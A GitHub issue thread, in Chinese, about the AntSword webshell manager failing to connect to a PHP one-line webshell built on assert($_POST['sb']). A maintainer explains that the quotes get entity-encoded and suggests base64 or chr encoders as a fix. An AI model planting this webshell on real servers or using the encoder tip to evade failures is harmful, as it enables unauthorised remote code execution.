### ISSUE TITLE
assert一句话无法连接

### ISSUE THREAD

**Issue by Porlockzzz** [AntSwordProject/antSword#124]
- [ ] 我确定这是蚁剑本身的一个 Bug，我并不是在询问如何使用蚁剑
- [√] 我确定已经将蚁剑升级至[软件发布页面](https://github.com/AntSwordProject/AntSword/releases)中的**最新版**
- [√] 尝试过自己通过Google等方式解决问题
- [ ] 这是一个新功能的建议
- [ ] 我查阅了文档没找到解决方案，所以来询问如何使用蚁剑

---

## 报告 Bug

- [√ ] 我使用的操作系统是 ***Windows*** 10+

---

- [ ] 我使用的是 32 位操作系统
- [ √] 我使用的是 64 位操作系统

### shell 连接 Bug

1. windows10

2. `<?php @assert($_POST['sb']);?>`

3. wamp3.1.4无任何禁用函数

4. 链接密码sb

5.挂http代理使用burpsuite抓包无返回

6.使用cknife可成功连接该一句话木马

**Comment by Medicean** [comment]
@Porlockzzz 因为 assert 会把传入的字符串的引号进行一次实体编码，导致执行失败。

编码器使用非 default 的就行了。

**Comment by Porlockzzz** [comment]
> @Porlockzzz 因为 assert 会把传入的字符串的引号进行一次实体编码，导致执行失败。
> 
> 编码器使用非 default 的就行了，比如使用 base64 或者 chr。

谢谢你的回答~问题已解决
